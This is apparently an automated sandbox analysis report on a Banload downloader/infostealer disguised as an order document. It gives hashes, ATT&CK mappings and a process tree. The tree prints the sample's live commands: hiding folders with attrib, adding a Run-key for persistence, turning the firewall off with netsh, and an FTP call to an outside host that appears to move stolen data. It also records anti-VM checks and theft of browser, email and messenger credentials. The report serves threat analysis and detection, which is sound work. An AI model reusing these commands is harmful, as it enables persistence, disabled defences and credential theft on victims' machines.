banload | a3ff31d8a37c4123f6243094e5f6dcd4fd62f65acae61a01e88a6db4b86b6262

Analysis

max time kernel
122s
max time network
126s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
17-09-2024 09:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Order details 20160623085712.exe
Size

2.3MB
MD5

54691a71a8920435efce855786f07173
SHA1

68d3c8f6ded0d63375f98cf38fda97a095ce704f
SHA256

5e289ad1f5c7d78cbe729e4ba1ccf31deaa6db940e8f3c3c8d8d339fba873209
SHA512

9c85656ac38ef0506cacfdbcdab1e5d5329b2d900e97de4f3e926da537e388150d0a7f250d1d88d63ce21830aa8780dea7b79fe22fcae7a557e21972aa61eaa6
SSDEEP

49152:Ipgs8ABpNAcbBicSTgbDgtcBbWRzfYb/kL+agsNFCriQmew54an1Fm:IGs8AvNzXgtcpEfFFC2QVbanm

Score

10^/10

banload collection credential_access discovery downloader dropper evasion persistence privilege_escalation spyware stealer trojan

Malware Config

Signatures

Banload
Banload variants download malicious files, then install and execute the files.
trojan dropper downloader banload
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

adbr01.exeadbr02.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ adbr01.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ adbr02.exe
Modifies Windows Firewall 2 TTPs 4 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid process

1756 netsh.exe
1236 netsh.exe
2000 netsh.exe
2336 netsh.exe
Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

2244 attrib.exe
2904 attrib.exe
2676 attrib.exe
2928 attrib.exe
2304 attrib.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	adbr01.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	adbr02.exe

pid	process
1756	netsh.exe
1236	netsh.exe
2000	netsh.exe
2336	netsh.exe

pid	process
2244	attrib.exe
2904	attrib.exe
2676	attrib.exe
2928	attrib.exe
2304	attrib.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

adbr01.exeadbr02.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	adbr01.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	adbr01.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	adbr02.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	adbr02.exe

Executes dropped EXE 7 IoCs

Processes:

Adobeta.exeadbr01.exeadbr01.exeadbr02.exeadbr02.exeAdobeta.exeAReader.exe

pid process

2060 Adobeta.exe
2116 adbr01.exe
2228 adbr01.exe
2592 adbr02.exe
2432 adbr02.exe
2472 Adobeta.exe
2732 AReader.exe
Loads dropped DLL 12 IoCs

Processes:

cmd.exeadbr01.exeadbr02.exe

pid process

1160 cmd.exe
1160 cmd.exe
1160 cmd.exe
1160 cmd.exe
2116 adbr01.exe
1160 cmd.exe
1160 cmd.exe
2592 adbr02.exe
1160 cmd.exe
1160 cmd.exe
1160 cmd.exe
1160 cmd.exe
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2060	Adobeta.exe
2116	adbr01.exe
2228	adbr01.exe
2592	adbr02.exe
2432	adbr02.exe
2472	Adobeta.exe
2732	AReader.exe

pid	process
1160	cmd.exe
1160	cmd.exe
1160	cmd.exe
1160	cmd.exe
2116	adbr01.exe
1160	cmd.exe
1160	cmd.exe
2592	adbr02.exe
1160	cmd.exe
1160	cmd.exe
1160	cmd.exe
1160	cmd.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

adbr02.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	adbr02.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

reg.exeadbr02.exeipconfig.exeadbr01.exeadbr02.exeOrder details 20160623085712.exeDllHost.exeattrib.exeAdobeta.exeAdobeta.exenetsh.exenetsh.exeattrib.execmd.exeAReader.exeWScript.exenetsh.exenetsh.exeWScript.execmd.exeattrib.exeadbr01.exexcopy.exeattrib.exeattrib.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr02.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ipconfig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr02.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Order details 20160623085712.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobeta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Adobeta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AReader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	adbr01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

xcopy.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

1260 ipconfig.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

pid	process
1260	ipconfig.exe

Modifies registry class 22 IoCs

Processes:

adbr01.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\VersionIndependentProgID\ = "msinkaut.InkPicture"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Control	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\ = "%CommonProgramFiles%\\Microsoft Shared\\Ink\\InkObj.dll"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\MiscStatus	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\MiscStatus\1	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID\ = "msinkaut.InkPicture.1"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Programmable	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\ThreadingModel = "Apartment"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\MiscStatus\ = "0"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ToolboxBitmap32	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\TypeLib\ = "{7D868ACD-1A5D-4a47-A247-F39741353012}"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Version\ = "1.0"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ = "Microsoft InkPicture Control"	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ToolboxBitmap32\ = "%CommonProgramFiles%\\Microsoft Shared\\Ink\\InkObj.dll, 212"	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\TypeLib	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Version	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\VersionIndependentProgID	adbr01.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Insertable	adbr01.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\MiscStatus\1\ = "131473"	adbr01.exe

NTFS ADS 3 IoCs

Processes:

adbr02.exeadbr01.exe

description	ioc	process
File opened for modification	C:\ProgramData\TEMP:663565B1	adbr02.exe
File created	C:\ProgramData\TEMP:663565B1	adbr01.exe
File opened for modification	C:\ProgramData\TEMP:663565B1	adbr01.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

adbr01.exeadbr02.exe

description	pid	process
Token: 33	2228	adbr01.exe
Token: SeIncBasePriorityPrivilege	2228	adbr01.exe
Token: 33	2228	adbr01.exe
Token: SeIncBasePriorityPrivilege	2228	adbr01.exe
Token: SeDebugPrivilege	2228	adbr01.exe
Token: 33	2432	adbr02.exe
Token: SeIncBasePriorityPrivilege	2432	adbr02.exe
Token: 33	2432	adbr02.exe
Token: SeIncBasePriorityPrivilege	2432	adbr02.exe
Token: SeDebugPrivilege	2432	adbr02.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

DllHost.exe

pid process

2696 DllHost.exe

pid	process
2696	DllHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Order details 20160623085712.exeWScript.execmd.exeWScript.exe

description	pid	process	target process
PID 1296 wrote to memory of 2364	1296	Order details 20160623085712.exe	WScript.exe
PID 1296 wrote to memory of 2364	1296	Order details 20160623085712.exe	WScript.exe
PID 1296 wrote to memory of 2364	1296	Order details 20160623085712.exe	WScript.exe
PID 1296 wrote to memory of 2364	1296	Order details 20160623085712.exe	WScript.exe
PID 1296 wrote to memory of 2364	1296	Order details 20160623085712.exe	WScript.exe
PID 1296 wrote to memory of 2364	1296	Order details 20160623085712.exe	WScript.exe
PID 1296 wrote to memory of 2364	1296	Order details 20160623085712.exe	WScript.exe
PID 2364 wrote to memory of 2752	2364	WScript.exe	cmd.exe
PID 2364 wrote to memory of 2752	2364	WScript.exe	cmd.exe
PID 2364 wrote to memory of 2752	2364	WScript.exe	cmd.exe
PID 2364 wrote to memory of 2752	2364	WScript.exe	cmd.exe
PID 2364 wrote to memory of 2752	2364	WScript.exe	cmd.exe
PID 2364 wrote to memory of 2752	2364	WScript.exe	cmd.exe
PID 2364 wrote to memory of 2752	2364	WScript.exe	cmd.exe
PID 2752 wrote to memory of 2460	2752	cmd.exe	xcopy.exe
PID 2752 wrote to memory of 2460	2752	cmd.exe	xcopy.exe
PID 2752 wrote to memory of 2460	2752	cmd.exe	xcopy.exe
PID 2752 wrote to memory of 2460	2752	cmd.exe	xcopy.exe
PID 2752 wrote to memory of 2460	2752	cmd.exe	xcopy.exe
PID 2752 wrote to memory of 2460	2752	cmd.exe	xcopy.exe
PID 2752 wrote to memory of 2460	2752	cmd.exe	xcopy.exe
PID 2752 wrote to memory of 2904	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2904	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2904	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2904	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2904	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2904	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2904	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2676	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2676	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2676	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2676	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2676	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2676	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2676	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2928	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2928	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2928	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2928	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2928	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2928	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2928	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2304	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2304	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2304	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2304	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2304	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2304	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2304	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2244	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2244	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2244	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2244	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2244	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2244	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 2244	2752	cmd.exe	attrib.exe
PID 2752 wrote to memory of 1800	2752	cmd.exe	WScript.exe
PID 2752 wrote to memory of 1800	2752	cmd.exe	WScript.exe
PID 2752 wrote to memory of 1800	2752	cmd.exe	WScript.exe
PID 2752 wrote to memory of 1800	2752	cmd.exe	WScript.exe
PID 2752 wrote to memory of 1800	2752	cmd.exe	WScript.exe
PID 2752 wrote to memory of 1800	2752	cmd.exe	WScript.exe
PID 2752 wrote to memory of 1800	2752	cmd.exe	WScript.exe
PID 1800 wrote to memory of 1160	1800	WScript.exe	cmd.exe

Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

2304 attrib.exe
2244 attrib.exe
2904 attrib.exe
2676 attrib.exe
2928 attrib.exe

pid	process
2304	attrib.exe
2244	attrib.exe
2904	attrib.exe
2676	attrib.exe
2928	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Order details 20160623085712.exe
"C:\Users\Admin\AppData\Local\Temp\Order details 20160623085712.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1296
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2364
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Windows\SysWOW64\xcopy.exe
      xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
      4⤵
      System Location Discovery: System Language Discovery
      Enumerates system info in registry
      PID:2460
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2904
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2676
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2928
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2304
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2244
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1800
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1160
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
        
        Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2060
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
        6⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:2204
      - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /all
        6⤵
        System Location Discovery: System Language Discovery
        Gathers network information
        
        PID:1260
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
        
        adbr01.exe -f "011.011"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2116
        
        C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
        
        adbr01.exe -f "011.011"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        NTFS ADS
        Suspicious use of AdjustPrivilegeToken
        
        PID:2228
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
        
        adbr02.exe -f "112.112"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2592
        
        C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
        
        adbr02.exe -f "112.112"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        NTFS ADS
        Suspicious use of AdjustPrivilegeToken
        
        PID:2432
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall set opmode disable
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1756
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set currentprofile state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1236
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set profiles state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2000
      - C:\Windows\SysWOW64\netsh.exe
        
        NetSh Advfirewall set allprofiles state off
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2336
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
        
        Adobeta.exe -a -c -d -natpasv -s:004.afq ftp.freehostia.com
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2472
      - C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe
        
        AReader 5400
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2732

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Licenses\086A4C8982A52E70F.Lic

Filesize
140B

MD5
e7edc1e12179070a0970b6c08d1c9df0

SHA1
e07c94952f278440de2dbd383c63c8a9cd4becc9

SHA256
3944d575662eca4075522bc2b50171f75e6e89b3de90fe40fbc3306aff13de16

SHA512
1744cf863c6093549269f8d97ca0e04f266f028720cc4219fb62645caecb24c46571c342d802004449b699a29ef3458c6ac96830e239ef9ca103d431320f29be

Download Submit
C:\ProgramData\TEMP:663565B1

Filesize
140B

MD5
3179f0e144bed9b21ca54f2e2673b71b

SHA1
c51524b6ac357c2391a38fca97563e389c0109aa

SHA256
b8064f0ce56034748141638e370b11e078ecaa7d26d21cbffaade005cddf66f0

SHA512
553d1198b353686e45225bc4865f319b6e257b8296b8be58edca6e52c1aa407790cfb87709833b3e870cb43c08cae8ee093cf046a5b0a9fd7e65c7b3b887f6ec

Download Submit
C:\ProgramData\TEMP\RAIDTest

Filesize
4B

MD5
4ce4d01ccc41c2e73643c40abe61aa58

SHA1
